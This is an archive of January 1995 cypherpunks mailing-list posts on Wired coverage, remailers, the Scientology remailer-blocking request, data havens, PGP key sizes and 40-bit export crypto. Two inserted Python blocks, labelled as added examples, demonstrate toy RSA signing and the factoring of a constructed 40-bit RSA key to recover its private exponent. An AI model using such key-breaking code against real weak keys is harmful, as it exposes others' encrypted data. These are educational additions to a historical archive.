> In any case, I apologize for my ignorance and will try to be on less of a
> hair trigger in the future. However, following a long stream of Wired
> interviews of bizarrely marginal community members, I simply assumed
> this was Yet Another.

And I apologize to Perry for not being even more elliptic in my
questioning of his language. It's just that Jude is pretty well known
out here, at least by the group that was at the early meetings, and
so....

One thing I've found is that the electronic age has made me more
careful about insulting specific people. The Kibo Effect, call it.
(Hi, Kibo!) 

General insults, or political statements, are of course kosher, but
making any kind of snide remarks about Joe Foobar, for example, will
often result in these comments being fed to that person. (I recently
made some comments here on this list about a public Net person, whom I
do not believe is or was subscribed...a few days later I got a
note from this person objecting to my characterization of his views! I
am assuming someone forwarded the traffic to him.)

So, if I see a "marginal" person interviewed by "Wired," I am
circumspect about commenting on them...they might be on the list, they
might actually be doing something important, etc. (Like that unknown
guy "Andreeson," or somesuch...I don't have any idea what he's done,
and I never heard of him before last year, but all the hype-zines are
putting him on their covers, so he must be doing something interesting
:).) 

Anyway, many of the folks "Wired" and the other hype-zines interview
are indeed strange and marginal. To be expected. There are only so
many of the standard "talking heads" that can be interviewed (the
stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.).

Frankly, I'd rather see a story on "Zippies," about which I'd heard
nothing substantive before, than Yet Another Ted Nelson Story, about
which I've heard entirely too much over the past decade. (Not to
insult Ted--Hi, Ted!--but there are only so many ways to tell the
Xanadu story...time for new approaches.)

I know some folks in the crypto/PGP community who were quite miffed
that such "marginal" folks as Eric Hughes, John Gilmore, and I were
featured on the cover of "Wired" 1.2 two years ago...they naturally
saw themselves as being more worthy, as perhaps they were....such is
life. The "credit assignment problem" in evolution and genetic
programming remains a tough one.

Finally, "Wired" is still mixing stories about flakes with seminal
articles, such as the one on "FinCEN" a while back. That makes it
still worth looking at, at least to me.


--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Mon, 16 Jan 95 07:27:26 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501161526.KAA28093@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


> Listen, you mentioned that you were getting
>the same problem with other remailers.  That was because you 
>were mailing through my remailer to them or from them, right?  I sure
>hope so.  I would hate to think my code affected others' remailers! :)
 
>    Homer

Yah, I'm 99% sure that is what happened. I'll be testing that today.
I've sent a few test messages to your remailer and everything came back just 
fine. The trouble with other remailers is that it can take as much as a full 
day before a message gets delivered.
I'll get back to you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 15 Jan 95 15:56:47 PST
To: cypherpunks@toad.com
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com>
Message-ID: <9501161049.ZM27032@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 13, 10:23pm, Raph Levien wrote:
> Negative response was immediate. The perpetrators were asked to stop,
> but they refused to. One Norwegian hacker took it upon himself to
> track down and "cancel" the offending messages. Most people on the Net
> considered this to be entirely appropriate.

It would probably be more accurate to say that there was little condemnation
of this action, and quite a groundswell of support for the move.

> A number of other self-promoting hucksters have sensed an opportunity,
> and have performed similar spams. In response, the Net evolved a
> defense mechanism to counter these spams and minimize the damage. The
> person currently serving this role is known by the pseudonym
> "CancelMoose." Almost everyone on the Net supports this effort, and
> agrees that it improves the overall value of Usenet.

Ditto.

> In many countries (and even China is on the Net these days), writings
> critical of the government, such as exposure of human rights abuses,
> are illegal. The authors face imprisonment, torture and death. By
> posting anonymously to the Net, the information can be brought safely
> to the attention of the world.

Perhaps mention the Russian coup, where the net became a conduit for
information leaving Moscow.  I remember a colleague of mine announcing
incidents which had occurred within Moscow hours before the news services
broadcast them, simply by getting emails from a colleague nearby.
						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 15 Jan 95 16:56:51 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <Pine.SV4.3.91.950115103408.725B-100000@xcalibur>
Message-ID: <9501161145.ZM27648@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 15, 10:35am, Jonathan Cooper wrote:
> > I wouldn't use BLOWFISH.

>    Why?

Well, I wasn't the original person who said that they wouldn't use it,
but I would agree.  It's too new.  It looks very good so far, but until it's
been through a lot more analysis than Blowfish has received so far, it is
too much of an unknown quantity.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 16 Jan 95 12:24:53 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <199501162024.MAA21177@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@netcom.com (Timothy C. May)
> General insults, or political statements, are of course kosher, but
> making any kind of snide remarks about Joe Foobar, for example, will
> often result in these comments being fed to that person. (I recently
> made some comments here on this list about a public Net person, whom I
> do not believe is or was subscribed...a few days later I got a
> note from this person objecting to my characterization of his views! I
> am assuming someone forwarded the traffic to him.)

I felt the same way recently.  I had commented here about elec cash
prodigy Stefan Brands being among those not getting into the DigiCash demo,
it got cross-posted to www-buyinfo (which is read by DigiCash people) and
led to a big political stink that may have set back relations between
Brands and Chaum and therefore the prospects for high-quality digital
cash.  I really regretted my words as it was certainly not my intention
to stir up bad blood.  I still tend to think of this list as a relatively
private place to make comments "just among friends", unlike more public
venues which feed into a wider cross-section of views and where I try to
be much more circumspect.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 16 Jan 95 10:36:41 PST
Subject: REQUEST:  Privacy/Free Speech URLs
Message-ID: <Pine.ULT.3.91.950116123112.15935A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On the request of a few law-related professors and other faculty, I'm
trying to put together a web page that brings together resources from all
over the net that are related to issues of free speech, privacy, libel,
censorship, etc. 

If you have a few URLs with materials related to the above, I'd 
appreciate it if you could drop them in an emailee to me.  Basically, any 
URL that ends up pointing to issues of rights and rules on the net, and 
possibly related software (such as PGP and the like).

Thanks much :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxq8aTokqlyVGmCFAQGPXwP+LpyRgw+fuV4HXzt3ObGyu4ME8XsgBbRz
Z2yyhVsbeK9DnhJuYPRiaHGjOmO3rl+9qmjisxbmQA8YkmKIyIGB8ViP7RKLoUlg
vCUzr00AbQHc9SZKuuQCyOSHirDNZfc/3A92U1MsEXZl/gACoNxOq3+uSqyE9LWu
bQrXW4xbl+0=
=2H+w
-----END PGP SIGNATURE-----


____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 16 Jan 95 10:01:22 PST
To: cypherpunks@toad.com
Subject: Re: Scientology (fwd)
Message-ID: <199501161802.NAA17787@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is the copy that was sent to the remailer operators' list. Note that
the start of "FROM:" is corrupted, and there's some odd line breaking. I'm
guessing that's the reason the signature doesn't check (for me, either).

 -L. Futplex McCarthy

Forwarded message:
> From remailer-operators-owner@c2.org Sun Jan 15 15:08:56 1995
> To: Remailer-Operators@c2.org
> Message-Id: <ab3f26ae01021004e8c7@[137.110.24.249]>
> Date: Sun, 15 Jan 1995 11:56:48 -0800
> From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
> Subject: Re: Scientology
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>                                                          1/15/95=20
> 
> TO:    THOMAS M. SMALL
>        COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
>        PUBLICATIONS, INC.
> 
> =46ROM:  Lance Cottrell
>        Operator of remailer@nately and mixmaster@nately
> 
> In response to your email of January 3, 1995 requesting that I block=
>  anonymous posting to the Internet news groups alt.clearing.technology and a=
> lt.religion.scientology.
> 
> Although my remailers have always supported direct posting to news groups,=
>  this feature has never been advertised or supported. Since direct posting=
>  from my remailers is never used, I am willing to comply with your request.=
>  Posting to alt.clearing.technology and alt.religion.scientology has been bl=
> ocked.
> 
> By this action I do not admit to any wrongdoing on my part, nor do I wish to=
>  imply any wrongdoing on the part of any users of my remailers. I am merely=
>  turning of a feature that I never intended to be used.
> 
> By design it is not possible to prevent users from using my remailers to=
>  send a message to another computer to be posted. I can not, and will not,=
>  block mail to other remailers or to mail-to-news gateways.
> 
>                                 Yours,
>                                         Lance M. Cottrell
> 
> CC: Cypherpunks@toad.com, remailer-operators@c2.org,
>     alt.privacy.anon-server, alt.privacy,
>     alt.religion.scientology, alt.clearing.technology
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM
> Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3
> ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94
> EH/mStSfdJY=3D
> =3DUgN1
> -----END PGP SIGNATURE-----
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 16 Jan 95 13:21:10 PST
To: cypherpunks@toad.com
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <199501162121.NAA05239@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: aba@atlas.ex.ac.uk

   I have had a look at the exported version of Netscape's WWW browser
   which has support for secure transfer of info, and it says it uses RSA
   keys limited to 40

That's RSADSI's RC4 cipher, not the RSA public key cipher.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 16 Jan 95 11:04:29 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com>
Message-ID: <9501161903.AA07088@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> One thing I've found is that the electronic age has made me more
> careful about insulting specific people. The Kibo Effect, call it.
> (Hi, Kibo!) 

I wasn't insulting Jude (whoever she is; I don't know her and have no
reason to have an opinion on her); I was insulting "Wired".

> Frankly, I'd rather see a story on "Zippies," about which I'd heard
> nothing substantive before, than Yet Another Ted Nelson Story, about
> which I've heard entirely too much over the past decade.

On the other hand, "Wired" used to interview people who were fairly
unknown but important -- there is an endless supply of such
people. When was the last time you saw an interview with someone like
Rick Adams, for example? He's not necessarily the *most* important
person on the planet, but being the proprietor of a company that runs
a good fraction of the world's internet connectivity and just got
partially bought by Microsoft, he's pretty important in a lot of ways,
and I legitimately know little about him. How about an article on the
economics of cellphone fraud -- a multi-billion dollar industry
created by the NSA and its desire to stop encryption from being
used. Lots of cool stuff out there to report on -- no need to do
fashion-fluff.

> I know some folks in the crypto/PGP community who were quite miffed
> that such "marginal" folks as Eric Hughes, John Gilmore, and I were
> featured on the cover of "Wired" 1.2 two years ago...

Two years ago, the average article in "Wired" was worth reading --
informative, cutting edge, accurate, and about something
important. Today, the articles are more likely to be about weird
hangers on from the cultural fringes mumbling weird deconstructionist
ravings about obscure topics. I've found an average of only one decent
article per issue lately -- and I have no doubt they'll fix that soon.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Mon, 16 Jan 95 13:33:31 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110103ab4095d1582a@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think we're pretty well agreed that Dave's DataHaven can't ensure that
files are encrypted without looking inside them at some point. It's a
dilemma: Dave wants to be sure he can't read something, but the only way
he can be sure is by reading it.

But suppose that Dave's good friend Ender Trent decides to set up a new
service, Ender Trent's Trusted Encryption. It's a simple job: people send
files to Ender and he returns them encrypted and signed. Now, all Dave
needs do is check Ender's signature before accepting a file. At no point
does Dave ever decrypt or attempt to decrypt such a file.

Ender offers encryption in many different forms. In the simplest, Alice
sends the file to Ender, Ender generates a random key, encrypts the file,
and sends both back to Alice. Almost as simple, Ender uses the hash of
the original file as the key. Presumably, Alice already knows the hash
and so Ender doesn't send that back.

Alice could supply a public PGP (or other asymmetrical algorithm) key
with the file and Ender uses that. If Alice is a frequent customer and
likes this method, she might register the key with Ender.

Lastly, Alice might want to supply a symmetric key of her own. Because
Ender wants to protect people like Dave, he can either print a warning
that the key used for encryption might not be secure, or run a
password-cracking algorithm on it, or both. Because of the extra effort
and reduced security, Ender might not want to offer this, or charge an
arm and a leg for it. And Dave might not be willing to accept such
files, anyway.

How is it better to have Ender do all this rather than Dave? Essentially,
it splits the risk. Dave never sees the files, and therefore can't be
responsible for their contents. Nor could he make sense out of them, even
if he tried really, really hard. He could operate his data haven in all
but the most repressive parts of the world.

Ender's risk is slim to none. Were he to be held accountable for files he
encrypts, public notaries would likewise have to be held accountable for
everything they notarize. I don't see that as a problem.

Dave might wish to offer an encryption service, as Ender might want to
offer a data haven, but, if they're smart, they won't accept files that
they themselves encrypted.

Ender's encryption need not only be for data havens, of course. Nervous
remailer operators might want proof of encryption. Escrow services will
likely like Ender. And probably more.

If there is a demand for a trusted encryption service, I'll create one
after the second trumpet audition for the Oregon Symphony on the first of
the month.  That's the main reason I'm signing this--to hold myself to it.

b&

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.
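
[Added example, not part of the original post: a sketch of the Ender/Dave exchange described above, using the "hash of the original file as the key" variant. The toy RSA key, the SHA-256 keystream standing in for a real cipher, and all function names are assumptions of this example.]

```python
import hashlib

# Toy RSA key for Ender, built from two Mersenne primes so the block runs on
# the standard library alone. Far too small for real use (an assumption of
# this example; the post names no algorithm or key size).
_P, _Q = 2**127 - 1, 2**89 - 1
ENDER_N = _P * _Q
ENDER_E = 65537
_ENDER_D = pow(ENDER_E, -1, (_P - 1) * (_Q - 1))  # Ender's private exponent


def _digest_int(data: bytes) -> int:
    """SHA-256 of data as an integer reduced into the toy modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % ENDER_N


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher: XOR with SHA-256(key || counter). Same call decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def ender_encrypt_and_sign(plaintext: bytes):
    """Ender's side: key = hash of the file, encrypt, sign the ciphertext."""
    key = hashlib.sha256(plaintext).digest()
    ciphertext = keystream_xor(key, plaintext)
    signature = pow(_digest_int(ciphertext), _ENDER_D, ENDER_N)
    return ciphertext, signature


def dave_accepts(blob: bytes, signature: int) -> bool:
    """Dave's side: uses Ender's public key only and never tries to decrypt."""
    if not 0 < signature < ENDER_N:
        return False
    return pow(signature, ENDER_E, ENDER_N) == _digest_int(blob)


def demo() -> dict:
    # Constructed sample file.
    document = b"constructed sample file: minutes of the January meeting\n" * 3
    ciphertext, sig = ender_encrypt_and_sign(document)
    tampered = bytes([ciphertext[0] ^ 1]) + ciphertext[1:]
    alice_key = hashlib.sha256(document).digest()  # Alice already knows the hash
    return {
        "signed_ciphertext": dave_accepts(ciphertext, sig),
        "plaintext_with_borrowed_signature": dave_accepts(document, sig),
        "tampered_ciphertext": dave_accepts(tampered, sig),
        "alice_recovers_file": keystream_xor(alice_key, ciphertext) == document,
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

With the hash-as-key variant, anyone who already holds a copy of the plaintext can recompute the key, so it hides the file only from parties who have never seen it.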






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 11:59:00 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com>
Message-ID: <199501162004.PAA21196@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501161145.ZM27648@wiley.sydney.sgi.com>,
Ian Farquhar <ianf@sydney.sgi.com> wrote:
>Well, I wasn't the original person who said that they wouldn't use it,
>but I would agree.  It's too new.  It looks very good so far, but until it's
>been through a lot more analysis than Blowfish has received so far, it is
>too much of an unknown quantity.

That's okay.  So's my GUCAPI code (suggestions of a better name are
quite welcome.  I'm considering changing the name to the Hastur Crypto
Toolkit, purely on aesthetics).

BTW, pointers to public domain code for each of these ciphers/hashes would
be greatly appreciated.  The crypto part of the library is really going to
just be a collection of what's already available from elsewhere; the
main work is in genericizing the IO and the key management functions and
in making life difficult for people who don't follow the interface
properly.  Other than that, the only other real work is getting a reasonably
portable source of random numbers working as a default random source.

I'll also be distributing an ITAR-friendly "bones" version with instructions
on how to add ciphers.  Are PRNGs like BBS covered by ITAR?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxrRGSoZzwIn1bdtAQGfUAF9F0XSAuKnH+jJopAz02NYJmvA271oGq+A
7YSny6PSNLLK5wncl6lnbM0Rr3eQ58cf
=8qA2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 12:10:32 PST
To: cypherpunks@toad.com
Subject: Re: Pgp where?
Message-ID: <199501162015.PAA21338@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <ab3c722e200210036071@[192.187.167.52]>,
Dave Del Torto <ddt@lsd.com> wrote:
>FYI, I keep the most recent version of Mike Johnson's excellent guide on
>where to find PGP in:
>
>  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt

I also have an infobot on pgp-faq@hks.net.  Sending mail there will get
you a fast autoresponse with a reasonably recent version of the same
FAQ.

>Send email to <pgp-questions@lsd.com> if you have further questions.

And, I'll remind everyone that we need volunteers for the pgp-help mailing
list (Dave's on it).  It's important that we be able to identify what the
worst barriers to PGP use are and the best way to do that is to answer
folks' questions.  Send mail to pgp-help-request@hks.net to be added.

Thanks,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxrTxSoZzwIn1bdtAQGTzgGAlbPDZqyvoI+5nSZS8NaAnXL5iUXIVRip
bu3AM/mGFK/3Y0AsfKnhr4b3ZnZP1KXS
=4gk2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 16 Jan 95 13:42:58 PST
To: aba@atlas.ex.ac.uk
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <9501162142.AA17465@mostly-harmless.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I suspect that this is not an RSA keysize, but an RC4 keysize.  Does
it specify 40bit RSA keys?  Or does it say "40 bit cryptographic key"?
I suspect something closer to the latter, in which case I highly doubt
it is an RSA key.

A 40-bit RSA key can be broken in seconds.

A 40-digit RSA key will take a few days.

-derek
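
[Added example, not part of the original post: what "broken in seconds" means for a 40-bit RSA modulus, using Pollard's rho rather than the quadratic sieve asked about elsewhere in the thread. The modulus is constructed for this example from the primes on either side of one million; the function names are this example's own.]

```python
import math
import time


def pollard_rho(n: int) -> int:
    """Return a non-trivial factor of composite n (Floyd cycle detection)."""
    if n % 2 == 0:
        return 2
    for c in range(1, 50):            # retry with a new polynomial on failure
        x = y = 2
        d = 1
        while d == 1:
            x = (x * x + c) % n       # tortoise: one step
            y = (y * y + c) % n       # hare: two steps
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:                    # d == n means the cycle closed unluckily
            return d
    raise ValueError("no factor found")


def break_rsa_modulus(n: int, e: int):
    """Factor n and rebuild the private exponent from the factors."""
    start = time.perf_counter()
    p = pollard_rho(n)
    q = n // p
    d = pow(e, -1, (p - 1) * (q - 1))
    elapsed = time.perf_counter() - start
    return min(p, q), max(p, q), d, elapsed


# Constructed 40-bit modulus (sample value, not taken from any real key).
N = 999983 * 1000003
E = 65537

if __name__ == "__main__":
    p, q, d, elapsed = break_rsa_modulus(N, E)
    print(f"n = {N} ({N.bit_length()} bits) = {p} * {q}")
    print(f"private exponent recovered in {elapsed:.4f} s")
    # Round trip with the recovered exponent shows the key is fully broken.
    message = 42
    assert pow(pow(message, E, N), d, N) == message
```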




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Mon, 16 Jan 95 14:52:49 PST
To: cypherpunks@toad.com
Subject: Longer than 1048 bit keys
Message-ID: <v01510103ab40a8df63bd@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm using MacPGP 2.6(ui) and noticed that the limit for a key size is the
1048 bit ("military grade" (right)). Is there any way to circumvent this to
make larger, harder-to-break-type keys?
TIA,
- -J

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

-----END PGP SIGNATURE-----

                   (-:                     aka:                    :-)
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public PGP block. :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Mon, 16 Jan 95 14:00:17 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: REQUEST:  Privacy/Free Speech URLs
Message-ID: <199501162159.QAA09934@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>On the request of a few law-related professors and other faculty, I'm
>trying to put together a web page that brings together resources from all
>over the net that are related to issues of free speech, privacy, libel,
>censorship, etc. 
>
>If you have a few URLS with materials related to the above, I'd 
>appreciate it if you could drop them in an emailee to me.  Basically, any 
>URL that ends up pointing to issues of rights and rules on the net, and 
>possibly related software (such as PGP and the like).
>
>Thanks much :-)

Check out Vince Cate's Cryptorebel/Cypherpunk Page at: 
ftp://furmint.nectar.cs.cmu.edu/security/README.html
It has just about everything with links to other sites that have links to 
other sites that have links to.... it's a web thing. :-)


***********************************************
jml@wizard.synapse.net
PGP encrypted mail preferred.
I might disagree totally with what you say but I'll defend your right to say 
it to the death.

***********************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 16 Jan 95 08:17:53 PST
To: cypherpunks@toad.com
Subject: Re: Scientology [!]
Message-ID: <9501161616.AA06028@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> -----BEGIN PGP SIGNED MESSAGE-----
> 
>                                                          1/15/95 
> 
> TO:    THOMAS M. SMALL
>        COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
>        PUBLICATIONS, INC.
> 
> FROM:  Lance Cottrell
>        Operator of remailer@nately and mixmaster@nately



My pgp says: Bad signature

Does this message come from Lance Cottrell or from Scientology?


>  I am willing to comply with your request.

Oh. If this is true (is it?) and other remailer operators do the
same, there will be no anonymous criticism of the Thetans any more.
A non-anonymous criticism of this "church" is said to be a thing
of a special kind.


Mmmh,

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Jan 95 14:30:25 PST
To: cypherpunks@toad.com
Subject: US News on Policing Cyberspace
Message-ID: <199501162229.RAA29483@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


US News of January 23 has a cover story on "policing cyberspace", another
drumbeat about "the growing threats to your privacy and property in the
information age." 
 
Not much new for this group except to enjoy another Spielberg gremlin of
Jekyll and Hyde cryptography, fearful remailers, slippery digicash, stolen
services and personal data, smuggling, terrorism, child pornography,
Tennessee BBS, "cybercops" and such. 
 
Featuring the FBI's Kallstrom and Tafoya and FLETC and Financial Fraud
Institute and Clipper and protective wiretaps, with supporting roles for
Kevin Mitnick, Bruce Schneier, Mike Godwin, Marc Rotenberg, John Perry
Barlow, Esther Dyson, Robert Corn-Revere. 
 
And, a cartoon on how to teach parents fear of the Net for their children. 
 
Cypherpunk is not sited, I think, or is it steganoed?.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 17 Jan 95 00:24:16 PST
To: cypherpunks@toad.com
Subject: Scientologys Attempts
Message-ID: <9501161644.AA06046@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



I just had a view into the alt.religion.scientology and
alt.clearing.technology newsgroups. There are some messages
about a Scientology decision to shut down every internet traffic
about Scientology. If the messages are true, Scientology sent 
rmgroup Control messages to remove the groups. 

The request to stop the remailers seems to come from the
same people...

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 16 Jan 95 15:03:29 PST
To: cypherpunks@toad.com
Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd)
Message-ID: <Pine.SOL.3.90.950116175820.28979C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 16 Jan 1995 16:44:07 -0500
From: Craig Peterson <craig@Mainstream.com>
To: Multiple recipients of list <rkba-alert@gatekeeper.nra.org>
Subject: INFO: NBC Nightly News Tonight

A story regarding the Internet, with some sort of mention of NRA.org,
should be on the NBC Nightly News with Tom Brokaw tonight.

Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 16 Jan 95 15:06:59 PST
To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID: <Pine.SUN.3.91.950116180305.15126A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Jan 1995, Robert Rothenberg wrote:

> Date: Sat, 14 Jan 1995 23:45:41 -0500 (EST)
> From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
> To: cypherpunks@toad.com
> Subject: Another problem w/Data Havens...
> 
> 
> I can see a potential problem with Data Havens (as they've been discussed
> here) that may very well inspire the wrath of the authorities more than
> nuclear secrets or dirty pictures of J.Edgar Hoover...
> 
> How does one keep a site from becoming a remote pirated-software exchange
> site? (Esp. since after that MIT case laws may be changed...) It seems that
> such a service could become a magnet for the "elite warez" crowd... and even
> if the operator isn't jailed it could lead to a shutdown of the service.
> 

Properly formatted, a dispersed multijurisdictional data haven can 
effectively say "Who cares" to the entirety of your point.

A data haven that mandates encryption for all incoming data will be 
essentially immune from this sort of problem.  The real measure of 
shutdown will be (on non-privately owned sites) the level of traffic that 
begins to interfere with other functions of the site.

Data havens that can split data to two or more locations in separate 
jurisdictions can effectively ignore attention from authorities not 
related to the site management or site performance.  Encryption mandated 
sites can also take this stance, while encryption is legal in any event.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
